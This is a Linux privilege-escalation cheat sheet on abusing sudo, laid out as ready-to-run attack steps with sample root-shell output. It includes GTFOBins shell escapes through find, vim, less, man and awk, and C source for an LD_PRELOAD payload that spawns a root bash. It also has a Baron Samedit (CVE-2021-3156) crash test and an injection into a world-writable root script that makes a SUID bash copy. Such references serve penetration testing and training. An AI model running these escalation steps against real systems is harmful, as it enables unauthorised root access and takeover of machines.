SUDO
Check sudo permissions
What can you run as root? — First thing to check always
sudo -l
Example Output
sudo -l
User www-data may run:
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /opt/backup.sh
(Check GTFOBins for vim and find)
GTFOBins lookup
Abuse allowed binaries — BOOKMARK THIS SITE
https://gtfobins.github.io/
Search for each sudo binary
Example Output
sudo -l shows: (root) NOPASSWD: /usr/bin/find
GTFOBins: https://gtfobins.github.io/gtfobins/find/
Sudo: sudo find . -exec /bin/sh \; -quit
# whoami
root
Sudo with no password
Run directly without password — Free root commands
If (NOPASSWD) in sudo -l output
Example Output
sudo -l
(root) NOPASSWD: /usr/bin/vim
sudo vim -c ':!bash'
# whoami
root
(No password prompt = direct escalation)
Sudo env_keep (LD_PRELOAD)
Hijack shared library loading — Runs your code as root
If env_keep+=LD_PRELOAD:
gcc -shared -fPIC -o /tmp/pe.so pe.c
sudo LD_PRELOAD=/tmp/pe.so <allowed_cmd>
Example Output
sudo -l shows: env_keep+=LD_PRELOAD
Compile:
#include <stdio.h>
void _init() { setuid(0); system("/bin/bash"); }
sudo LD_PRELOAD=/tmp/pe.so /usr/bin/allowed_command
# whoami
root
Sudo version exploit
sudo < 1.8.28 = CVE-2019-14287 sudo < 1.9.5p2 = CVE-2021-3156 — Baron Samedit, etc
sudo --version
Search: sudo <version> exploit
Example Output
sudo --version
Sudo version 1.8.31
CVE-2021-3156 (Baron Samedit):
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): corrupted
(Vulnerable! Use exploit for root)
Sudo with shell escape
Many programs have shell escapes — Check GTFOBins for each binary
sudo vim -> :!sh
sudo less -> !sh
sudo man -> !sh
sudo awk 'BEGIN {system("/bin/sh")}'
Example Output
sudo vim -c ':!sh'
# whoami
root
(Escaped to root shell via vim)
Sudo script injection
Edit the script, add reverse shell — Writable scripts run as root
If sudo allows running a script you can modify
Example Output
sudo -l: (root) /opt/backup.sh
ls -la /opt/backup.sh
-rwxrwxrwx 1 root root <- WORLD WRITABLE!
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /opt/backup.sh
sudo /opt/backup.sh
/tmp/rootbash -p
# whoami
root